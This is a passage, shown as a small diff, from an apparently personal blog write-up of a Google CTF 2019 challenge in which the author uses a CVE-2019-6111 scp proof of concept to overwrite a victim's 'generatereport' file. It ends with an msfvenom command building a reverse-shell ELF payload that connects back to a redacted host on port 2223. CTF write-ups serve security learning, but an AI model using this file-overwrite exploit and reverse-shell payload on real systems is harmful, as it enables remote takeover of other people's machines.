atorralba/atorralba.github.io/_posts/2019-06-23-GoogleCTF2019_BobNeedsAFile.md

 We have a functional PoC of CVE-2019-6111 to overwrite additional files other than the one requested via `scp`.
 Why don't we try to overwrite that `generatereport`, whatever it is? (assuming it's in the same directory where `data.txt` is being requested!)

 To confirm this, we firstly altered the exploit so that it sent an innocuous `generatereport` file to see what happened.
-And after setting the server up and speaking with Bob again, we happily checked that we no longer received the connection to the 2223 port after Bob's `scp`.
+And after setting the server up and speaking with Bob again, we happily checked that we no longer received the connection to port 2223 after Bob's `scp`.
 It seemed that our hypothesis was correct and `generatereport` was overwritten.
 Time to deliver a real payload!

 ~~~
 # msfvenom -p linux/x86/shell_reverse_tcp LHOST=REDACTED LPORT=2223 -f elf -o sploit